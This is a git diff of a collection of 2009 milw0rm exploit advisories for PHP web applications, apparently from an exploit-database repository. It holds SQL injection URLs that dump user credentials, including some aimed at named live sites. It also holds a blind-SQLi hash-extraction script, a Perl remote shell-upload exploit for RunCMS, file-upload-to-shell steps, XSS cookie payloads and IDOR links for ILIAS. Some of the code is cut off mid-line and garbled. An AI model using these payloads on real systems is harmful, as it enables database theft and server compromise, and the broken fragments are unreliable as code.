@@ -1,71 +1,71 @@ -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -- __ __ _ __ - -+ ____/ /___ ______/ /__ (_)___ / /_____ _____ + -- / __ / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/ - -+ / /_/ / /_/ / / / ,< / / /_/ / ,< / __/ / + -- \__,_/\__,_/_/ /_/|_|_/ /\____/_/|_|\___/_/ - -+ /___/ + -- - -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ - - +\n". - "- Ex. : php xpl.php localhost /MorcegoCMS/ root -\n". - "+ +\n". - "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n". - "\n"); -} - -function hex ($string) { - $i=0; - while ($i +\n". + "- Ex. : php xpl.php localhost /MorcegoCMS/ root -\n". + "+ +\n". + "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n". + "\n"); +} + +function hex ($string) { + $i=0; + while ($iArbitrary File Upload<-- - -1. Go to http://www.site.com/register.php -2. Disable JavaScript -3. Upload shell as "User Image" -4. Register -5. Shell location: http://www.site.com/userimages/SHELL.PHP - --->SQL Injection<-- - -http://www.site.com/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6-- - --->XSS<-- - -http://www.site.com/home.php?genres_parent="> - -Demo: - -http://www.opial.com/demo/register.php - -http://www.opial.com/demo/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6-- - -http://www.opial.com/demo/home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E - -LMaster. - -# milw0rm.com [2009-07-11] +::::::::::::::::::::R3AL.RU:::::::::::::::::::: + +Opial 1.0 Arbitrary File Upload & XSS & SQL Injection (genres_parent) + +Author: LMaster + +Greetz: r3al.ru + +Official Site (with demo): + +http://www.opial.com + +-->Arbitrary File Upload<-- + +1. Go to http://www.site.com/register.php +2. Disable JavaScript +3. Upload shell as "User Image" +4. Register +5. 
Shell location: http://www.site.com/userimages/SHELL.PHP + +-->SQL Injection<-- + +http://www.site.com/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6-- + +-->XSS<-- + +http://www.site.com/home.php?genres_parent="> + +Demo: + +http://www.opial.com/demo/register.php + +http://www.opial.com/demo/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6-- + +http://www.opial.com/demo/home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E + +LMaster. + +# milw0rm.com [2009-07-11] diff --git a/platforms/php/webapps/9125.txt b/platforms/php/webapps/9125.txt index 0fc6fe9dd..ba1769d37 100755 --- a/platforms/php/webapps/9125.txt +++ b/platforms/php/webapps/9125.txt 
@@ -1,34 +1,34 @@ ----------------------------------------------------------------------------------------------------- - -Name : Ebay Clone 2009 Multiple SQL Injection Vulnerabilities -Site : http://www.ebayclonescript.com/ -Demo : http://ebayclonescript.com/ebayclone2009/ - ----------------------------------------------------------------------------------------------------- - - -Found By : MizoZ [EvilWay Team] -Made in : Morocco -Contact : mizoz[at]9[dot]cn -Greetz : Moudi , Zuka , All friends - - ----------------------------------------------------------------------------------------------------- - -1st , SQL Injection (feedback.php GET(user_id)) : -http://ebayclonescript.com//ebayclone2009/feedback.php?user_id=368+union+select+1,2,3,version(),5,6,7,8--#footer - -2nd , SQL Injection (view_full_size.php GET(item_id)) : -http://ebayclonescript.com/ebayclone2009/view_full_size.php?i=1&item_id=-2904+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58-- - -3th , SQL Injection (classifide_ad.php GET(item_id)) : -http://ebayclonescript.com/ebayclone2009/classifide_ad.php?item_id=-2872+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58-- - -4th , Blind SQL Injection (crosspromoteitems.php GET(item_id)) : -http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=1-- -!= -http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=0-- - ----------------------------------------------------------------------------------------------------- - -# milw0rm.com [2009-07-11] +---------------------------------------------------------------------------------------------------- + +Name : Ebay Clone 2009 Multiple SQL Injection Vulnerabilities +Site : 
http://www.ebayclonescript.com/ +Demo : http://ebayclonescript.com/ebayclone2009/ + +---------------------------------------------------------------------------------------------------- + + +Found By : MizoZ [EvilWay Team] +Made in : Morocco +Contact : mizoz[at]9[dot]cn +Greetz : Moudi , Zuka , All friends + + +---------------------------------------------------------------------------------------------------- + +1st , SQL Injection (feedback.php GET(user_id)) : +http://ebayclonescript.com//ebayclone2009/feedback.php?user_id=368+union+select+1,2,3,version(),5,6,7,8--#footer + +2nd , SQL Injection (view_full_size.php GET(item_id)) : +http://ebayclonescript.com/ebayclone2009/view_full_size.php?i=1&item_id=-2904+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58-- + +3th , SQL Injection (classifide_ad.php GET(item_id)) : +http://ebayclonescript.com/ebayclone2009/classifide_ad.php?item_id=-2872+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58-- + +4th , Blind SQL Injection (crosspromoteitems.php GET(item_id)) : +http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=1-- +!= +http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=0-- + +---------------------------------------------------------------------------------------------------- + +# milw0rm.com [2009-07-11] diff --git a/platforms/php/webapps/9126.txt b/platforms/php/webapps/9126.txt index eb5500564..666ad8336 100755 --- a/platforms/php/webapps/9126.txt +++ b/platforms/php/webapps/9126.txt 
@@ -1,34 +1,34 @@ -############################################################### -# Joomla component 'com_category' SQL injection vulnerability ########### -################################################################ -#version: 1.0.12################################################### -################################################################ -#dork:inurl:"com_category"########################################## -# ############################################################### -# xploited by Prince_Pwn3r########################################## -################################################################ -# contact: 2p0wn0rN0t2p0wn@gmail.com############################## -################################################################ - -+++++++ greetz to all p0wnbox.com members !!! +++++++ --------------------------------------------------------------------------------------- - -Vulnerable joomla component : com_category -vulnerable parameter: "edit" ($_GET) - ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ - -Exploit : - - -http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- - -Demos : - -http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users-- -or -http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- - -*could be different (eg: view&color=3&cat_id=) - -# milw0rm.com [2009-07-11] +############################################################### +# Joomla component 'com_category' SQL injection vulnerability ########### +################################################################ 
+#version: 1.0.12################################################### +################################################################ +#dork:inurl:"com_category"########################################## +# ############################################################### +# xploited by Prince_Pwn3r########################################## +################################################################ +# contact: 2p0wn0rN0t2p0wn@gmail.com############################## +################################################################ + ++++++++ greetz to all p0wnbox.com members !!! +++++++ +-------------------------------------------------------------------------------------- + +Vulnerable joomla component : com_category +vulnerable parameter: "edit" ($_GET) + +----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +Exploit : + + +http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- + +Demos : + +http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users-- +or +http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- + +*could be different (eg: view&color=3&cat_id=) + +# milw0rm.com [2009-07-11] diff --git a/platforms/php/webapps/9127.txt b/platforms/php/webapps/9127.txt index 5dfa00215..2407eb3e1 100755 --- a/platforms/php/webapps/9127.txt +++ b/platforms/php/webapps/9127.txt 
@@ -1,83 +1,83 @@ -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -- __ __ _ __ - -+ ____/ /___ ______/ /__ (_)___ / /_____ _____ + -- / __ / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/ - -+ / /_/ / /_/ / / / ,< / / /_/ / ,< / __/ / + -- \__,_/\__,_/_/ /_/|_|_/ /\____/_/|_|\___/_/ - -+ /___/ + -- - -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ - -[+] Arbitrary Re-Installation Vulnerability - -There's no check about the elimination of 'help' directory, -then whenever an administrator forget to delete it, we can -re-install the CMS, it means we can add a new administrator -account, without specify database's informations. - -http://hostname/dnetCMS/help/install.php - - - -[+] Blind SQL Injection Exploit - - \n". - "[+] Ex. : php xpl.php localhost /dnetCMS/\n". - "[+] Greetz : cristina, puccio (they kept me company when I coded this stuff :D)\n". - "\n"); -} - -function hex ($string) { - $i=0; - while ($iCannot modify:|", $reply))) - return false; - else - return true; -} - -function get_field ($hostname, $path, $field) { - echo "[+] ".ucfirst($field)." 
(hash): "; - $chars = "abcdef0123456789"; - for($i=0,$d=1;$d<=32;$i++) { - if (check ($hostname, $path, $chars [$i], $d, $field)) { - echo $chars [$i]; - $i = -1; - $d++; - } - } - echo "\n"; -} - -if ($argc != 3) - usage (); -$hostname = $argv [1]; -$path = $argv [2]; -$fields = array ("username", "password"); -foreach ($fields as $field) - get_field ($hostname, $path, $field); - -# milw0rm.com [2009-07-11] ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +- __ __ _ __ - ++ ____/ /___ ______/ /__ (_)___ / /_____ _____ + +- / __ / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/ - ++ / /_/ / /_/ / / / ,< / / /_/ / ,< / __/ / + +- \__,_/\__,_/_/ /_/|_|_/ /\____/_/|_|\___/_/ - ++ /___/ + +- - ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +[+] Arbitrary Re-Installation Vulnerability + +There's no check about the elimination of 'help' directory, +then whenever an administrator forget to delete it, we can +re-install the CMS, it means we can add a new administrator +account, without specify database's informations. + +http://hostname/dnetCMS/help/install.php + + + +[+] Blind SQL Injection Exploit + + \n". + "[+] Ex. : php xpl.php localhost /dnetCMS/\n". + "[+] Greetz : cristina, puccio (they kept me company when I coded this stuff :D)\n". + "\n"); +} + +function hex ($string) { + $i=0; + while ($iCannot modify:|", $reply))) + return false; + else + return true; +} + +function get_field ($hostname, $path, $field) { + echo "[+] ".ucfirst($field)." (hash): "; + $chars = "abcdef0123456789"; + for($i=0,$d=1;$d<=32;$i++) { + if (check ($hostname, $path, $chars [$i], $d, $field)) { + echo $chars [$i]; + $i = -1; + $d++; + } + } + echo "\n"; +} + +if ($argc != 3) + usage (); +$hostname = $argv [1]; +$path = $argv [2]; +$fields = array ("username", "password"); +foreach ($fields as $field) + get_field ($hostname, $path, $field); + +# milw0rm.com [2009-07-11] 
diff --git a/platforms/php/webapps/9129.txt b/platforms/php/webapps/9129.txt index 8387290e7..aa8dc31db 100755 --- a/platforms/php/webapps/9129.txt +++ b/platforms/php/webapps/9129.txt 
@@ -1,34 +1,34 @@ -================================================================================================ - - Title : (Blind SQL/XSS) Multiple Remote Vulnerabilities - Software : Censura v1.16.04 - Vendor : http://www.censura.info/ - - Date : 12 July 2009 (Indonesia) - Author : Vrs-hCk - Contact : d00r@telkom.net - Blog : http://c0li.blogspot.com/ - - ================================================================================================ - - [-] Exploit - - http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL] - http://[site]/[path]/censura.php?cmd=details&itemid=[XSS] - - [-] Demo - - http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4 - http://www.yoozreviews.com/censura.php?cmd=details&itemid= - - ================================================================================================ - - Greetz : - - Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy, - bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^) - c0li.m0de.0n and Behave oR BeGone !!! 
- - ================================================================================================ - -# milw0rm.com [2009-07-12] +================================================================================================ + + Title : (Blind SQL/XSS) Multiple Remote Vulnerabilities + Software : Censura v1.16.04 + Vendor : http://www.censura.info/ + + Date : 12 July 2009 (Indonesia) + Author : Vrs-hCk + Contact : d00r@telkom.net + Blog : http://c0li.blogspot.com/ + + ================================================================================================ + + [-] Exploit + + http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL] + http://[site]/[path]/censura.php?cmd=details&itemid=[XSS] + + [-] Demo + + http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4 + http://www.yoozreviews.com/censura.php?cmd=details&itemid= + + ================================================================================================ + + Greetz : + + Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy, + bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^) + c0li.m0de.0n and Behave oR BeGone !!! + + ================================================================================================ + +# milw0rm.com [2009-07-12] diff --git a/platforms/php/webapps/9132.py b/platforms/php/webapps/9132.py index 5ea995d8b..d62e5ec04 100755 --- a/platforms/php/webapps/9132.py +++ b/platforms/php/webapps/9132.py 
@@ -1,118 +1,118 @@ -#!/usr/bin/perl - -# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -# RunCMS <= 1.6.3 "double ext" remote shell injection exploit # -# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -# # -# Note: you may upload files with double extension # -# FCKEditor must be enabled for users # -# # -# # -# by staker # -# ------------------------------ # -# mail: staker[at]hotmail[dot]it # -# url: http://www.runcms.org # -# ------------------------------ # -# Discovered on 15 June 2009 # -# Happy Birthday Irene # -# ----------------------------------------------------------- # - - -use IO::Socket; -use LWP::UserAgent; - - -cronx_us(); - -my ($host,$path,$username) = @ARGV; -my $password = $ARGV[3] || exit; -my $filename = "snippet.jpg.pwl"; # change it this is just an example - -shell_up(); - -sub cronx_us() { - - print "[*------------------------------------------------------------*]\n". - "[* RunCMS <= 1.6.3 (fckeditor) remote shell injection exploit *]\n". - "[*------------------------------------------------------------*]\n". - "[* Usage: perl web.pl [host] [path] [user] [pass] *]\n". - "[* *]\n". - "[* Options: *]\n". - "[* [host] insert a valid host *]\n". - "[* [path] insert a valid RunCMS path *]\n". - "[* [user] your username *]\n". - "[* [pass] your password *]\n". 
- "[*------------------------------------------------------------*]\n"; -} - -sub login() { - - my $LWP = new LWP::UserAgent; - - my $post = $LWP->post(http_url($host)."/$path/user.php", - [ uname => $username, - pass => $password, - op => 'login', - ]) || die $!; - - if ($post->as_string =~ /Set-Cookie: (.*)/i) { - return $1; - } -} - -sub http_url() { - - my $string = shift @_ || die($!); - - if ($string !~ /^http:\/\/?/i) { - return 'http://'.$string; - } -} - - -sub shell_up() { - - my ($data,$packet,$result); - my $cookie = login(); - - - my $vector = chr(45) x27; - my $socket = new IO::Socket::INET( - PeerAddr => $host, - PeerPort => 80, - Proto => 'tcp', - ) or die $!; - - - $data .= $vector."--uploading\r\n"; - $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; - $data .= "Content-Type: unknown/unknown\r\n\r\n"; - $data .= "\r\n"; - $data .= $vector."--uploading--\r\n"; - - $packet .= "POST $path/class/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; - $packet .= "Content-Type: multipart/form-data; boundary=".$vector."uploading\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Cookie: $cookie\r\n"; - $packet .= "User-Agent :Lynx (textmode)\r\n"; - $packet .= "Content-Length: ".length($data)."\r\n"; - $packet .= "Connection: Close\r\n\r\n"; - $packet .= $data; - - $socket->send($packet); - - foreach $result (<$socket>) { - - if ($result =~ /file uploader is disabled/i) { - die("No access for you..\n"); - } - else { - print $result; - } - } -} - - -__END__ - -# milw0rm.com [2009-07-13] +#!/usr/bin/perl + +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # +# RunCMS <= 1.6.3 "double ext" remote shell injection exploit # +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # +# # +# Note: you may upload files with double extension # +# FCKEditor must be enabled for users # +# # +# # +# by staker # +# ------------------------------ # +# mail: staker[at]hotmail[dot]it # +# url: 
http://www.runcms.org # +# ------------------------------ # +# Discovered on 15 June 2009 # +# Happy Birthday Irene # +# ----------------------------------------------------------- # + + +use IO::Socket; +use LWP::UserAgent; + + +cronx_us(); + +my ($host,$path,$username) = @ARGV; +my $password = $ARGV[3] || exit; +my $filename = "snippet.jpg.pwl"; # change it this is just an example + +shell_up(); + +sub cronx_us() { + + print "[*------------------------------------------------------------*]\n". + "[* RunCMS <= 1.6.3 (fckeditor) remote shell injection exploit *]\n". + "[*------------------------------------------------------------*]\n". + "[* Usage: perl web.pl [host] [path] [user] [pass] *]\n". + "[* *]\n". + "[* Options: *]\n". + "[* [host] insert a valid host *]\n". + "[* [path] insert a valid RunCMS path *]\n". + "[* [user] your username *]\n". + "[* [pass] your password *]\n". + "[*------------------------------------------------------------*]\n"; +} + +sub login() { + + my $LWP = new LWP::UserAgent; + + my $post = $LWP->post(http_url($host)."/$path/user.php", + [ uname => $username, + pass => $password, + op => 'login', + ]) || die $!; + + if ($post->as_string =~ /Set-Cookie: (.*)/i) { + return $1; + } +} + +sub http_url() { + + my $string = shift @_ || die($!); + + if ($string !~ /^http:\/\/?/i) { + return 'http://'.$string; + } +} + + +sub shell_up() { + + my ($data,$packet,$result); + my $cookie = login(); + + + my $vector = chr(45) x27; + my $socket = new IO::Socket::INET( + PeerAddr => $host, + PeerPort => 80, + Proto => 'tcp', + ) or die $!; + + + $data .= $vector."--uploading\r\n"; + $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; + $data .= "Content-Type: unknown/unknown\r\n\r\n"; + $data .= "\r\n"; + $data .= $vector."--uploading--\r\n"; + + $packet .= "POST $path/class/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; + $packet .= "Content-Type: multipart/form-data; 
boundary=".$vector."uploading\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Cookie: $cookie\r\n"; + $packet .= "User-Agent :Lynx (textmode)\r\n"; + $packet .= "Content-Length: ".length($data)."\r\n"; + $packet .= "Connection: Close\r\n\r\n"; + $packet .= $data; + + $socket->send($packet); + + foreach $result (<$socket>) { + + if ($result =~ /file uploader is disabled/i) { + die("No access for you..\n"); + } + else { + print $result; + } + } +} + + +__END__ + +# milw0rm.com [2009-07-13] diff --git a/platforms/php/webapps/9138.txt b/platforms/php/webapps/9138.txt index b64e67d53..69def6a87 100755 --- a/platforms/php/webapps/9138.txt +++ b/platforms/php/webapps/9138.txt 
@@ -1,26 +1,26 @@
-#################################################################
-# _______ _________ _ #
-# ( ____ )\__ __/( ( /| #
-# | ( )| ) ( | \ ( | #
-# | (____)| | | | \ | | #
-# | __) | | | (\ \) | #
-# | (\ ( | | | | \ | #
-# | ) \ \__ | | | ) \ | #
-# |/ \__/ )_( |/ )_) #
-# http://root-the.net #
-#################################################################
-#[+] onepund shop 1.x products.php SQL Injection Vulnerability #
-#[+] Vendor : onepound.cn #
-#[+] Exploit : Affix #
-#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
-# str0ke, tekto, SonicX, Android, tw0 #
-#[+] dork : "Powered by OnePound" #
-#################################################################
-
-Example :
- http://site.com/products.php?id='
-
-Demo :
- http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--
-
-# milw0rm.com [2009-07-13]
+#################################################################
+# _______ _________ _ #
+# ( ____ )\__ __/( ( /| #
+# | ( )| ) ( | \ ( | #
+# | (____)| | | | \ | | #
+# | __) | | | (\ \) | #
+# | (\ ( | | | | \ | #
+# | ) \ \__ | | | ) \ | #
+# |/ \__/ )_( |/ )_) #
+# http://root-the.net #
+#################################################################
+#[+] onepund shop 1.x products.php SQL Injection Vulnerability #
+#[+] Vendor : onepound.cn #
+#[+] Exploit : Affix #
+#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
+# str0ke, tekto, SonicX, Android, tw0 #
+#[+] dork : "Powered by OnePound" #
+#################################################################
+
+Example :
+ http://site.com/products.php?id='
+
+Demo :
+ http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--
+
+# milw0rm.com [2009-07-13]
diff --git a/platforms/php/webapps/9145.php b/platforms/php/webapps/9145.php
index d21f6704e..40ca5a884 100755
--- a/platforms/php/webapps/9145.php
+++ b/platforms/php/webapps/9145.php
@@ -1,237 +1,237 @@ - - -# milw0rm.com [2009-07-14] + + +# milw0rm.com [2009-07-14] diff --git a/platforms/php/webapps/9150.txt b/platforms/php/webapps/9150.txt index d9632ff4b..2034005ec 100755 --- a/platforms/php/webapps/9150.txt +++ b/platforms/php/webapps/9150.txt 
@@ -1,37 +1,37 @@
-###############################
-# Source: WordPress Plugin: My Category Order <= 2.8 (mycategoryorder.php) / SQL Injection Vulnerability
-# Download: http://wordpress.org/extend/plugins/my-category-order/
-# No Dork
-# Author: ManhLuat93 [at] hcegroup[dot]net
-###############################
-
-Errors appears only when you have admin control
-
-Open mycategoryorder.php (Line 47-48):
-if (isset($_GET['parentID']))
-$parentID = $_GET['parentID'];
-
-Fix:
-if (isset($_GET['parentID']))
-$parentID = intval($_GET['parentID']);
-
-
-[+] Exploit [+]
-
-
-http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
-
-MySQL Query Error:
-
-WordPress database error:
-
- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY term_order ASC' at line 1]
-SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = 'category' and parent = 0' ORDER BY term_order ASC
-
-
-
-[+] http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1
-
-[+] What do you see ?
-
-# milw0rm.com [2009-07-15]
+###############################
+# Source: WordPress Plugin: My Category Order <= 2.8 (mycategoryorder.php) / SQL Injection Vulnerability
+# Download: http://wordpress.org/extend/plugins/my-category-order/
+# No Dork
+# Author: ManhLuat93 [at] hcegroup[dot]net
+###############################
+
+Errors appears only when you have admin control
+
+Open mycategoryorder.php (Line 47-48):
+if (isset($_GET['parentID']))
+$parentID = $_GET['parentID'];
+
+Fix:
+if (isset($_GET['parentID']))
+$parentID = intval($_GET['parentID']);
+
+
+[+] Exploit [+]
+
+
+http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
+
+MySQL Query Error:
+
+WordPress database error:
+
+ [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY term_order ASC' at line 1]
+SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = 'category' and parent = 0' ORDER BY term_order ASC
+
+
+
+[+] http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1
+
+[+] What do you see ?
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/php/webapps/9151.txt b/platforms/php/webapps/9151.txt
index 98c073068..399c3974f 100755
--- a/platforms/php/webapps/9151.txt
+++ b/platforms/php/webapps/9151.txt
@@ -1,259 +1,259 @@ -*********************************************************************************************** -*********************************************************************************************** -** ** -** ** -** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** -** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** -** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** -** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ -**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- -** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ - [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** -** ** -** ** -** ME VOY A LA PLAYA!...QUE CALOoOoOoR!...Lo0oL ** -** Ä„PROUD TO BE SPANISH! ** -** ** -*********************************************************************************************** -*********************************************************************************************** - ----------------------------------------------------------------------------------------------- -| MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION | -|--------------------------------------------------------------------------------------------| -| | ILIAS LMS <= 3.10.7/3.9.9 | | -| CMS INFORMATION: ----------------------------------- | -| | -|-->WEB: http://www.ilias.de/ | -|-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu | -|-->DEMO: http://www.demo.ilias-support.com/ | -|-->CATEGORY: LMS/Education | -|-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you | -| to easily manage learning resources in an integrated system. 
| -|-->RELEASED: 2009-06-22 | -| | -| CMS VULNERABILITY: | -| | -|-->TESTED ON: firefox 3 | -|-->DORK: "powered by ILIAS" | -|-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE | -|-->AFFECT VERSION: 3.10.7/3.9.9 | -|-->Discovered Bug date: 2009-06-28 | -|-->Reported Bug date: 2009-06-28 | -|-->Fixed bug date: 2009-06-30 | -|-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35 | -| &client_id=docu | -|-->Author: YEnH4ckEr | -|-->mail: y3nh4ck3r[at]gmail[dot]com | -|-->WEB/BLOG: N/A | -|-->COMMENT: YEnH4ckEr <--<3--> Marijose. | -| I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^ | ----------------------------------------------------------------------------------------------- - - - -<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>> - - - -I used my own account in my university...sorry for testing :P - - - -################################# -///////////////////////////////// - -ARBITRARY INFORMATION DISCLOSURE - -///////////////////////////////// -################################# - - - -------------------- -------------------- - -"POST-ITS" ISSUE: - -------------------- -------------------- - - - -When a user, teacher, admin, alumn, post a new post-its, -he could read all post-its in database. - -The vuln link would be: - -http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0¬e_id=1¬e_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI - - -Changing note_id=1 for other value, for ex. 100, we could -read this posts-it. - -That seems a low risk vuln but, when i tested on-line, ie, -against my university and i've got a lot of sensitive information. - - - -------------------- -------------------- - -"CMD" ISSUE: - -------------------- -------------------- - - - -Course/group/... 
calendars: - -This would be a normal link: - - -http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438 - - -But if I change cmd=frameset for cmd=edit: - - -http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit - - -I access to information about this group/course/..., and I tried to -change it, but i got permission denied...anyway, i -can get how it's configured this group/course/... - - - -------------------- -------------------- - -"CALENDAR" ISSUE: - -------------------- -------------------- - - - -http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI - - -Changing category_id, it shows sensitive information about -any course/group/... - -Personal and global calendars are secure. - - - -######################################### -///////////////////////////////////////// - -ARBITRARY INFORMATION DISCLOSURE/EDITION - -///////////////////////////////////////// -######################################### - - - -This module (favorite) allows to get a repository of favorite links - - - -------------------- -------------------- - -"FAVORITE" ISSUE: - -------------------- -------------------- - - -This would be the vuln link: - - -http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI - - -GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link. 
